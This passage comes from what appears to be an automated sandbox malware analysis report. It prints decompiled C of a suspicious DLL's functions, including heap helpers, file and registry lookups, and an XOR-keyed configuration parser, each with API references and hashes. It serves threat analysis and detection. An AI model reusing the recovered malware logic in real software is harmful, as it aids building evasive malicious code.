						if(_t19 == 0) {
							_t23 = 8;
						} else {
							 *_a16 = _t19;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}

0x007d8e86
0x007d8e88
0x007d8e8f
0x007d8e90
0x007d8e91
0x007d8e92
0x007d8e98
0x007d8e9d
0x007d8e9d
0x007d8ea7
0x007d8eb9
0x007d8ec0
0x007d8eef
0x007d8ec2
0x007d8ec7
0x007d8eec
0x007d8ec9
0x007d8ecc
0x007d8ed3
0x007d8ede
0x007d8ed5
0x007d8ed8
0x007d8ed8
0x007d8ee2
0x007d8ee2
0x007d8ec7
0x007d8ef6

APIs

Part of subcall function 007D89FA: SysFreeString.OLEAUT32(?), ref: 007D8AD9

Part of subcall function 007D499C: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,007D46CA,004F0053,00000000,?), ref: 007D49A5
Part of subcall function 007D499C: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,007D46CA,004F0053,00000000,?), ref: 007D49CF
Part of subcall function 007D499C: memset.NTDLL ref: 007D49E3

SysFreeString.OLEAUT32(00000000), ref: 007D8EE2

Memory Dump Source

Source File: 00000000.00000002.976426512.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.976417267.00000000007D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976440223.00000000007DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.976454333.00000000007DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976462982.00000000007DF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_loaddll32.jbxd

Similarity

API ID: FreeString$lstrlenmemcpymemset
String ID:
API String ID: 397948122-0
Opcode ID: d53179d2d20a38486b5e4c4b1d78030a0e888e2f6dfdd9ee5d6388d0377560a3
Instruction ID: 9b5610c70d01f6cbf9e6f9b8823062608f1eac0946dfec88c16bfbe81c292bb2
Opcode Fuzzy Hash: d53179d2d20a38486b5e4c4b1d78030a0e888e2f6dfdd9ee5d6388d0377560a3
Instruction Fuzzy Hash: AA015A3250002DFFCB52ABA8CC05DAEBBB8FB48710B004567E905E6260DB78A9559B92

Uniqueness

Uniqueness Score: -1.00%

Function 007D7227, Relevance: 1.5, APIs: 1, Instructions: 41
memoryCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E007D7227(signed int __eax, void* __ecx, intOrPtr* __esi, void* _a4) {
				char _v8;
				void* _t14;
				intOrPtr _t17;
				void* _t20;
				void* _t26;

				_push(__ecx);
				if(_a4 == 0 || __eax == 0) {
					_t26 = 0x57;
				} else {
					_t14 = E007D7185(__eax,  &_a4, _a4,  &_a4,  &_v8); // executed
					_t26 = _t14;
					if(_t26 == 0) {
						_t17 =  *0x7dd27c; // 0x2bda5a8
						_t9 = _t17 + 0x7dea58; // 0x444f4340
						_t20 = E007D8930( *((intOrPtr*)(__esi + 4)),  *__esi, _t9, _a4, _v8, __esi + 8, __esi + 0xc); // executed
						_t26 = _t20;
						RtlFreeHeap( *0x7dd238, 0, _a4); // executed
					}
				}
				return _t26;
			}

0x007d722a
0x007d7230
0x007d7287
0x007d7236
0x007d7241
0x007d7246
0x007d724a
0x007d7257
0x007d725f
0x007d726b
0x007d7273
0x007d727d
0x007d727d
0x007d724a
0x007d728c

APIs

Part of subcall function 007D7185: RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 007D719D

Part of subcall function 007D8930: lstrlen.KERNEL32(73BCF710,?,00000000,?,73BCF710), ref: 007D8964
Part of subcall function 007D8930: StrStrA.SHLWAPI(00000000,?), ref: 007D8971
Part of subcall function 007D8930: RtlAllocateHeap.NTDLL(00000000,?), ref: 007D8990

RtlFreeHeap.NTDLL(00000000,00000000,?,444F4340,00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,007D8727), ref: 007D727D

Memory Dump Source

Source File: 00000000.00000002.976426512.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.976417267.00000000007D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976440223.00000000007DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.976454333.00000000007DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976462982.00000000007DF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_loaddll32.jbxd

Similarity

API ID: Heap$Allocate$Freelstrlen
String ID:
API String ID: 2220322926-0
Opcode ID: 590ae1c023afd6bdaf9713b854bdb4e42b86e9702da8913f63b10478572408c9
Instruction ID: a22b55e766a5c2d8213eaceda00597c47397b83691d08ca49ea5a028c3844590
Opcode Fuzzy Hash: 590ae1c023afd6bdaf9713b854bdb4e42b86e9702da8913f63b10478572408c9
Instruction Fuzzy Hash: FC016976100108FFDB268F54CC01EAA7BB9FB54380F10812AF9458A260EB3AFE44DB50

Uniqueness

Uniqueness Score: -1.00%

Function 007D6EF8, Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E007D6EF8(void* _a4) {
				char _t2;

				_t2 = RtlFreeHeap( *0x7dd238, 0, _a4); // executed
				return _t2;
			}

0x007d6f04
0x007d6f0a

APIs

RtlFreeHeap.NTDLL(00000000,00000000,007D4499,00000000,?,?,00000000), ref: 007D6F04

Memory Dump Source

Source File: 00000000.00000002.976426512.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.976417267.00000000007D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976440223.00000000007DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.976454333.00000000007DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976462982.00000000007DF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_loaddll32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: a09b13db1f02c169bf47cc55716bc483485dd57df25d6251e242799176f0f7e8
Instruction ID: 2ca773bbc4c7f1c1764dffb3e801b760a1397708f14678d029b3aef6ac9af702
Opcode Fuzzy Hash: a09b13db1f02c169bf47cc55716bc483485dd57df25d6251e242799176f0f7e8
Instruction Fuzzy Hash: 76B01231001100EBDF124B40DD08F05BB31BB50700F01C016B200140B083755820FB1D

Uniqueness

Uniqueness Score: -1.00%

Function 007D3727, Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E007D3727(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x7dd238, 0, _a4); // executed
				return _t2;
			}

0x007d3733
0x007d3739

APIs

RtlAllocateHeap.NTDLL(00000000,00000000,007D43D1), ref: 007D3733

Memory Dump Source

Source File: 00000000.00000002.976426512.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.976417267.00000000007D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976440223.00000000007DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.976454333.00000000007DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976462982.00000000007DF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_loaddll32.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 886a15c767c62b9b0141d023719a68d1047279d27ae0bdb259a6c399650f59a3
Instruction ID: 15b048860fe07aa5da404358ce2dcfcfff6776605fc13a53bc4f1dfce221bf1b
Opcode Fuzzy Hash: 886a15c767c62b9b0141d023719a68d1047279d27ae0bdb259a6c399650f59a3
Instruction Fuzzy Hash: C6B01236401100EBCA124B40DD04F09FB31BB54700F00C216B20444070C3755860EB0D

Uniqueness

Uniqueness Score: -1.00%

Function 007D924D, Relevance: 1.3, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E007D924D(intOrPtr* __eax, void* __ecx, void* __edx, void* _a4, void** _a8) {
				int _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				int _v60;
				char _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				char _v92;
				void* _t35;
				void* _t40;
				void* _t49;
				void* _t51;
				int _t57;
				void* _t60;
				void* _t61;

				_t51 = _a4;
				_t57 = 0;
				_t58 = __ecx;
				_v12 = 0;
				_v8 = 0;
				_a4 = 0;
				if(__ecx <= 0x40 ||  *__eax != 0x200) {
					L21:
					return _t57;
				} else {
					_t6 = _t58 - 0x40; // 0x7d9f2b
					_t55 =  &_v92;
					_t35 = E007D566C(__eax,  &_v92, __edx,  &_v92,  &_v12, _t51 + _t6);
					if(_t35 != 0) {
						goto L21;
					}
					_t59 = __ecx - 0x40;
					if(_v60 > __ecx - 0x40) {
						goto L21;
					}
					while( *((char*)(_t61 + _t35 - 0x48)) == 0) {
						_t35 = _t35 + 1;
						if(_t35 < 0x10) {
							continue;
						}
						_t57 = _v60;
						_t49 = E007D3727(_t57);
						_t70 = _t49;
						_a4 = _t49;
						if(_t49 != 0) {
							_t57 = 0;
							L18:
							if(_t57 != 0) {
								goto L21;
							}
							L19:
							if(_a4 != 0) {
								E007D6EF8(_a4);
							}
							goto L21;
						}
						memcpy(_t49, _t51, _t57);
						L8:
						_t60 = _a4;
						E007D8054(_t55, _t70, _t60, _t57,  &_v28);
						if(_v28 != _v92 || _v24 != _v88 || _v20 != _v84 || _v16 != _v80) {
							L15:
							_t57 = 0;
							goto L19;
						} else {
							 *_a8 = _t60;
							goto L18;
						}
					}
					_t40 = E007D51AA(_t59, _t51,  &_a4,  &_v8,  &_v76, 0); // executed
					__eflags = _t40;
					if(_t40 != 0) {
						_t57 = _v8;
						goto L18;
					}
					_t57 = _v60;
					__eflags = _v8 - _t57;
					if(__eflags >= 0) {
						goto L8;
					}
					goto L15;
				}
			}

0x007d9254
0x007d9259
0x007d925b
0x007d9260
0x007d9263
0x007d9266
0x007d9269
0x007d933d
0x007d9343
0x007d927b
0x007d927b
0x007d9284
0x007d9288
0x007d928f
0x00000000
0x00000000
0x007d9295
0x007d929b
0x00000000
0x00000000
0x007d92a1
0x007d92a8
0x007d92ac
0x00000000
0x00000000
0x007d92ae
0x007d92b2
0x007d92b7
0x007d92b9
0x007d92bc
0x007d9324
0x007d932b
0x007d932d
0x00000000
0x00000000
0x007d932f
0x007d9333
0x007d9338
0x007d9338
0x00000000
0x007d9333
0x007d92c1
0x007d92c9
0x007d92c9
0x007d92d2
0x007d92dd
0x007d9320
0x007d9320
0x00000000
0x007d92f7
0x007d92fa
0x00000000
0x007d92fa
0x007d92dd
0x007d930f
0x007d9314
0x007d9316
0x007d9328
0x00000000
0x007d9328
0x007d9318
0x007d931b
0x007d931e
0x00000000
0x00000000
0x00000000
0x007d931e

APIs

memcpy.NTDLL(00000000,007D9F6B,?,?,?,007D9F6B,007D9F2B,00000002,007D9F6B,007D9F6B), ref: 007D92C1

Memory Dump Source

Source File: 00000000.00000002.976426512.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.976417267.00000000007D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976440223.00000000007DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.976454333.00000000007DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976462982.00000000007DF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_loaddll32.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: a620f4689c48fa591fc3f23790f24d0c9d9e07b2d4cf3a6bab0f6675acc6b2d4
Instruction ID: b1f9eaa3d17baf61eecd2c4c24b8339d4dd8317a8a938100f41330ae7505cf2a
Opcode Fuzzy Hash: a620f4689c48fa591fc3f23790f24d0c9d9e07b2d4cf3a6bab0f6675acc6b2d4
Instruction Fuzzy Hash: 18314D72900108EBDF11DF95C8849EEBBB9EF54350F604017FA15A7381D738AE85CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 007D41FE, Relevance: 1.3, APIs: 1, Instructions: 57
memoryCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E007D41FE(void* __ecx, signed char* _a4) {
				void* _v8;
				void* _t8;
				signed short _t11;
				signed int _t12;
				signed int _t14;
				intOrPtr _t15;
				void* _t19;
				signed short* _t22;
				void* _t24;
				intOrPtr* _t27;

				_t24 = 0;
				_push(0);
				_t19 = 1;
				_t27 = 0x7dd330;
				E007D80DF();
				while(1) {
					_t8 = E007D7DA3(_a4,  &_v8); // executed
					if(_t8 == 0) {
						break;
					}
					_push(_v8);
					_t14 = 0xd;
					_t15 = E007D4FD8(_t14);
					if(_t15 == 0) {
						HeapFree( *0x7dd238, 0, _v8);
						break;
					} else {
						 *_t27 = _t15;
						_t27 = _t27 + 4;
						_t24 = _t24 + 1;
						if(_t24 < 3) {
							continue;
						} else {
						}
					}
					L7:
					_push(1);
					E007D80DF();
					if(_t19 != 0) {
						_t22 =  *0x7dd338; // 0x33b98b0
						_t11 =  *_t22 & 0x0000ffff;
						if(_t11 < 0x61 || _t11 > 0x7a) {
							_t12 = _t11 & 0x0000ffff;
						} else {
							_t12 = (_t11 & 0x0000ffff) - 0x20;
						}
						 *_t22 = _t12;
					}
					return _t19;
				}
				_t19 = 0;
				goto L7;
			}

0x007d4206
0x007d420a
0x007d420b
0x007d420c
0x007d4211
0x007d4216
0x007d421d
0x007d4224
0x00000000
0x00000000
0x007d4226
0x007d422b
0x007d422c
0x007d4233
0x007d424d
0x00000000
0x007d4235
0x007d4235
0x007d4237
0x007d423a
0x007d423e
0x00000000
0x00000000
0x007d4240
0x007d423e
0x007d4255
0x007d4255
0x007d4257
0x007d425e
0x007d4260
0x007d4266
0x007d426d
0x007d427d
0x007d4275
0x007d4278
0x007d4278
0x007d4280
0x007d4280
0x007d4289
0x007d4289
0x007d4253
0x00000000

APIs

Part of subcall function 007D80DF: GetProcAddress.KERNEL32(36776F57,007D4216), ref: 007D80FA

Part of subcall function 007D7DA3: RtlAllocateHeap.NTDLL(00000000,63699BC3,00000000), ref: 007D7DCE
Part of subcall function 007D7DA3: RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 007D7DF0
Part of subcall function 007D7DA3: memset.NTDLL ref: 007D7E0A
Part of subcall function 007D7DA3: CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 007D7E48
Part of subcall function 007D7DA3: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 007D7E5C
Part of subcall function 007D7DA3: FindCloseChangeNotification.KERNELBASE(00000000), ref: 007D7E73
Part of subcall function 007D7DA3: StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 007D7E7F
Part of subcall function 007D7DA3: lstrcat.KERNEL32(?,642E2A5C), ref: 007D7EC0
Part of subcall function 007D7DA3: FindFirstFileA.KERNELBASE(?,?), ref: 007D7ED6

Part of subcall function 007D4FD8: lstrlen.KERNEL32(?,00000000,007DD330,00000001,007D4231,007DD00C,007DD00C,00000000,00000005,00000000,00000000,?,?,?,007D93A5,007D59DA), ref: 007D4FE1
Part of subcall function 007D4FD8: mbstowcs.NTDLL ref: 007D5008
Part of subcall function 007D4FD8: memset.NTDLL ref: 007D501A

HeapFree.KERNEL32(00000000,007DD00C,007DD00C,007DD00C,00000000,00000005,00000000,00000000,?,?,?,007D93A5,007D59DA,007DD00C,?,007D59DA), ref: 007D424D

Memory Dump Source

Source File: 00000000.00000002.976426512.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.976417267.00000000007D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976440223.00000000007DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.976454333.00000000007DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976462982.00000000007DF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_loaddll32.jbxd

Similarity

API ID: FileHeap$AllocateFindmemset$AddressChangeCloseCreateFirstFreeNotificationProcTimelstrcatlstrlenmbstowcs
String ID:
API String ID: 983081259-0
Opcode ID: dd812d85e1fccc6cd0e50c604ef3e1ab56e5d38ec2196b3ca3e7559bfabe58c3
Instruction ID: 73591e5a5a0cb31f3f407d9928cc691f15076f7a8eddf4a65a8ed3dce21dcee1
Opcode Fuzzy Hash: dd812d85e1fccc6cd0e50c604ef3e1ab56e5d38ec2196b3ca3e7559bfabe58c3
Instruction Fuzzy Hash: 9701F132600200EBEB109FE6CC85B7A73B9FF45354F14403BB984C63A0E6BCED81A265

Uniqueness

Uniqueness Score: -1.00%

Function 007DA3A7, Relevance: 1.3, APIs: 1, Instructions: 41
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E007DA3A7(void** __esi, intOrPtr _a4, unsigned int _a8, void* _a12) {
				signed short _t18;
				void* _t24;
				signed int _t26;
				signed short _t27;

				if(_a4 != 0) {
					_t18 = E007D8E7C(_a4, _a8, _a12, __esi); // executed
					_t27 = _t18;
				} else {
					_t27 = E007D82C4(0, 0x80000002, _a8, _a12,  &_a12,  &_a8);
					if(_t27 == 0) {
						_t26 = _a8 >> 1;
						if(_t26 == 0) {
							_t27 = 2;
							HeapFree( *0x7dd238, 0, _a12);
						} else {
							_t24 = _a12;
							 *(_t24 + _t26 * 2 - 2) =  *(_t24 + _t26 * 2 - 2) & _t27;
							 *__esi = _t24;
						}
					}
				}
				return _t27;
			}

0x007da3af
0x007da404
0x007da409
0x007da3b1
0x007da3cb
0x007da3cf
0x007da3d4
0x007da3d6
0x007da3e6
0x007da3f2
0x007da3d8
0x007da3d8
0x007da3db
0x007da3e0
0x007da3e0
0x007da3d6
0x007da3cf
0x007da40f

APIs

Part of subcall function 007D82C4: RegCloseKey.ADVAPI32(80000002,?,007D9CE1,3D007DC0,80000002,007D37CC,00000000,007D37CC,?,65696C43,80000002,00000000,?), ref: 007D835B

HeapFree.KERNEL32(00000000,?,00000000,80000002,73BCF710,?,?,73BCF710,00000000,?,007D3B5D,?,004F0053,033B9388,00000000,?), ref: 007DA3F2

Memory Dump Source

Source File: 00000000.00000002.976426512.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.976417267.00000000007D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976440223.00000000007DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.976454333.00000000007DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976462982.00000000007DF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_loaddll32.jbxd

Similarity

API ID: CloseFreeHeap
String ID:
API String ID: 1266433183-0
Opcode ID: a2d8bcd876f1fe2b59ad71efce51168ea54b535b3297e8673e125d40cddc3452
Instruction ID: 75c3fdc1a51d7103c25c0b265118be70ce60edca173c3506391891b5de4b39be
Opcode Fuzzy Hash: a2d8bcd876f1fe2b59ad71efce51168ea54b535b3297e8673e125d40cddc3452
Instruction Fuzzy Hash: 9F011D32100689FBCF22CF58CC45FAA3B76FB94350F14842AFA155A260DB75D922EB15

Uniqueness

Uniqueness Score: -1.00%

Function 007D4CD6, Relevance: 1.3, APIs: 1, Instructions: 36
sleepCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E007D4CD6(intOrPtr* __edi) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _t15;
				intOrPtr* _t21;

				_t21 = __edi;
				_push( &_v12);
				_push(__edi);
				_v8 = 0x1d4c0;
				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
				while(1) {
					_v16 = _t15;
					Sleep(0x1f4); // executed
					if(_v12 == 4) {
						break;
					}
					if(_v8 == 0) {
						L4:
						_t15 =  *((intOrPtr*)( *_t21 + 0xe0))(_t21,  &_v12);
						continue;
					} else {
						if(_v8 <= 0x1f4) {
							_v16 = 0x80004004;
						} else {
							_v8 = _v8 - 0x1f4;
							goto L4;
						}
					}
					L8:
					return _v16;
				}
				goto L8;
			}

0x007d4cd6
0x007d4ce3
0x007d4ce4
0x007d4ce5
0x007d4cec
0x007d4d1a
0x007d4d1b
0x007d4d1e
0x007d4d24
0x00000000
0x00000000
0x007d4d03
0x007d4d0d
0x007d4d14
0x00000000
0x007d4d05
0x007d4d08
0x007d4d28
0x007d4d0a
0x007d4d0a
0x00000000
0x007d4d0a
0x007d4d08
0x007d4d2f
0x007d4d35
0x007d4d35
0x00000000

APIs

Sleep.KERNELBASE(000001F4), ref: 007D4D1E

Memory Dump Source

Source File: 00000000.00000002.976426512.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.976417267.00000000007D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976440223.00000000007DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.976454333.00000000007DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976462982.00000000007DF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_loaddll32.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 077fe5933639a567e7ea46178292d9447d04d8e3ca363e5ef5d6437e4da63c91
Instruction ID: 18ac57d5f777984d6079e63a6205664e63f7143922b34468a5946cff18742764
Opcode Fuzzy Hash: 077fe5933639a567e7ea46178292d9447d04d8e3ca363e5ef5d6437e4da63c91
Instruction Fuzzy Hash: DDF0EC75D01119EFDB10DB94D888AEDB7B8FF04705F1080ABE60267240D7B85B44DF61

Uniqueness

Uniqueness Score: -1.00%

Function 007D6F0D, Relevance: 1.3, APIs: 1, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E007D6F0D(void* __edi, void* _a4) {
				int _t7;
				int _t12;

				_t7 = E007D813D(__edi, _a4,  &_a4); // executed
				_t12 = _t7;
				if(_t12 != 0) {
					memcpy(__edi, _a4, _t12);
					 *((char*)(__edi + _t12)) = 0;
					E007D6EF8(_a4);
				}
				return _t12;
			}

0x007d6f19
0x007d6f1e
0x007d6f22
0x007d6f29
0x007d6f34
0x007d6f38
0x007d6f38
0x007d6f41

APIs

Part of subcall function 007D813D: memcpy.NTDLL(00000000,00000090,00000002,00000002,007D9F6B,00000008,007D9F6B,007D9F6B,?,007D4C77,007D9F6B), ref: 007D8173
Part of subcall function 007D813D: memset.NTDLL ref: 007D81E9
Part of subcall function 007D813D: memset.NTDLL ref: 007D81FD

memcpy.NTDLL(00000002,007D9F6B,00000000,00000002,007D9F6B,007D9F6B,007D9F6B,?,007D4C77,007D9F6B,?,007D9F6B,00000002,?,?,007D5A08), ref: 007D6F29

Part of subcall function 007D6EF8: RtlFreeHeap.NTDLL(00000000,00000000,007D4499,00000000,?,?,00000000), ref: 007D6F04

Memory Dump Source

Source File: 00000000.00000002.976426512.00000000007D1000.00000020.00000001.sdmp, Offset: 007D0000, based on PE: true

Associated: 00000000.00000002.976417267.00000000007D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976440223.00000000007DC000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.976454333.00000000007DD000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.976462982.00000000007DF000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7d0000_loaddll32.jbxd

Similarity

API ID: memcpymemset$FreeHeap
String ID:
API String ID: 3053036209-0
Opcode ID: b59a7573dcf2bd9b67491a6e2f094aa200180c7d7dd4597d906506ccbd8023e2
Instruction ID: 489b2afcdf5de4e386f5e23dd9a92582fb8707520387f9ec75a2d3f49d718d78
Opcode Fuzzy Hash: b59a7573dcf2bd9b67491a6e2f094aa200180c7d7dd4597d906506ccbd8023e2
Instruction Fuzzy Hash: 6AE08C77401228B7CB122B94DC05DEFBF7C9F567D0F004026FE089A302DA2ADA10A3E2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 007DA032, Relevance: 9.2, APIs: 6, Instructions: 223
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E007DA032(int* __ecx) {
				int _v8;
				void* _v12;
				void* __esi;
				signed int _t20;
				signed int _t25;
				char* _t31;
				char* _t32;
				char* _t33;
				char* _t34;
				char* _t35;
				void* _t36;
				void* _t37;
				void* _t38;
				intOrPtr _t39;
				void* _t41;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t46;
				intOrPtr _t49;
				signed int _t50;
				signed int _t55;
				void* _t57;
				void* _t58;
				signed int _t60;
				signed int _t64;
				signed int _t68;
				signed int _t72;
				signed int _t76;
				signed int _t80;
				void* _t85;
				intOrPtr _t102;

				_t86 = __ecx;
				_t20 =  *0x7dd278; // 0x63699bc3
				if(E007D9AD6( &_v12,  &_v8, _t20 ^ 0x8241c5a7) != 0 && _v8 >= 0x90) {
					 *0x7dd2d4 = _v12;
				}
				_t25 =  *0x7dd278; // 0x63699bc3
				if(E007D9AD6( &_v12,  &_v8, _t25 ^ 0xecd84622) == 0) {
					_push(2);
					_pop(0);
					goto L60;
				} else {
					_t85 = _v12;
					if(_t85 == 0) {
						_t31 = 0;
					} else {
						_t80 =  *0x7dd278; // 0x63699bc3
						_t31 = E007D5163(_t86, _t85, _t80 ^ 0x724e87bc);
					}
					if(_t31 != 0) {
						_t86 =  &_v8;
						if(StrToIntExA(_t31, 0,  &_v8) != 0) {
							 *0x7dd240 = _v8;
						}
					}
					if(_t85 == 0) {
						_t32 = 0;
					} else {
						_t76 =  *0x7dd278; // 0x63699bc3
						_t32 = E007D5163(_t86, _t85, _t76 ^ 0x2b40cc40);
					}
					if(_t32 != 0) {
						_t86 =  &_v8;
						if(StrToIntExA(_t32, 0,  &_v8) != 0) {
							 *0x7dd244 = _v8;
						}
					}
					if(_t85 == 0) {
						_t33 = 0;
					} else {
						_t72 =  *0x7dd278; // 0x63699bc3
						_t33 = E007D5163(_t86, _t85, _t72 ^ 0x3b27c2e6);
					}
					if(_t33 != 0) {
						_t86 =  &_v8;
						if(StrToIntExA(_t33, 0,  &_v8) != 0) {
							 *0x7dd248 = _v8;
						}
					}
					if(_t85 == 0) {
						_t34 = 0;
					} else {
						_t68 =  *0x7dd278; // 0x63699bc3
						_t34 = E007D5163(_t86, _t85, _t68 ^ 0x0602e249);
					}
					if(_t34 != 0) {
						_t86 =  &_v8;
						if(StrToIntExA(_t34, 0,  &_v8) != 0) {
							 *0x7dd004 = _v8;
						}
					}
					if(_t85 == 0) {
						_t35 = 0;
					} else {
						_t64 =  *0x7dd278; // 0x63699bc3
						_t35 = E007D5163(_t86, _t85, _t64 ^ 0x3603764c);
					}
					if(_t35 != 0) {
						_t86 =  &_v8;
						if(StrToIntExA(_t35, 0,  &_v8) != 0) {
							 *0x7dd02c = _v8;
						}
					}
					if(_t85 == 0) {
						_t36 = 0;
					} else {
						_t60 =  *0x7dd278; // 0x63699bc3
						_t36 = E007D5163(_t86, _t85, _t60 ^ 0x2cc1f2fd);
					}
					if(_t36 != 0) {
						_push(_t36);
						_t57 = 0x10;
						_t58 = E007D3D45(_t57);
						if(_t58 != 0) {
							_push(_t58);
							E007D3E16();
						}
					}
					if(_t85 == 0) {
						_t37 = 0;
					} else {
						_t55 =  *0x7dd278; // 0x63699bc3
						_t37 = E007D5163(_t86, _t85, _t55 ^ 0xb30fc035);
					}
					if(_t37 != 0 && E007D3D45(0, _t37) != 0) {
						_t102 =  *0x7dd32c; // 0x33b95b0
						E007D40BB(_t102 + 4, _t53);
					}
					if(_t85 == 0) {
						_t38 = 0;
					} else {
						_t50 =  *0x7dd278; // 0x63699bc3
						_t38 = E007D5163(_t86, _t85, _t50 ^ 0x372ab5b7);
					}
					if(_t38 == 0) {
						L51:
						_t39 =  *0x7dd27c; // 0x2bda5a8
						_t18 = _t39 + 0x7de252; // 0x616d692f
						 *0x7dd2d0 = _t18;
						goto L52;
					} else {
						_t49 = E007D3D45(0, _t38);
						 *0x7dd2d0 = _t49;
						if(_t49 != 0) {
							L52:
							if(_t85 == 0) {
								_t41 = 0;
							} else {
								_t46 =  *0x7dd278; // 0x63699bc3
								_t41 = E007D5163(_t86, _t85, _t46 ^ 0xd8dc5cde);
							}
							if(_t41 == 0) {
								_t42 =  *0x7dd27c; // 0x2bda5a8
								_t19 = _t42 + 0x7de791; // 0x6976612e
								_t43 = _t19;
							} else {
								_t43 = E007D3D45(0, _t41);
							}
							 *0x7dd340 = _t43;
							HeapFree( *0x7dd238, 0, _t85);
							L60:
							return 0;
						}
						goto L51;
					}
				}
			}

0x007da032
0x007da035
0x007da055
0x007da063
0x007da063
0x007da068
0x007da082
0x007da280
0x007da282
0x00000000
0x007da088
0x007da088
0x007da08f
0x007da0a5
0x007da091
0x007da091
0x007da09e
0x007da09e
0x007da0af
0x007da0b1
0x007da0bb
0x007da0c0
0x007da0c0
0x007da0bb
0x007da0c7
0x007da0dd
0x007da0c9
0x007da0c9
0x007da0d6
0x007da0d6
0x007da0e1
0x007da0e3
0x007da0ed
0x007da0f2
0x007da0f2
0x007da0ed
0x007da0f9
0x007da10f
0x007da0fb
0x007da0fb
0x007da108
0x007da108
0x007da113
0x007da115
0x007da11f
0x007da124
0x007da124
0x007da11f
0x007da12b
0x007da141
0x007da12d
0x007da12d
0x007da13a
0x007da13a
0x007da145
0x007da147
0x007da151
0x007da156
0x007da156
0x007da151
0x007da15d
0x007da173
0x007da15f
0x007da15f
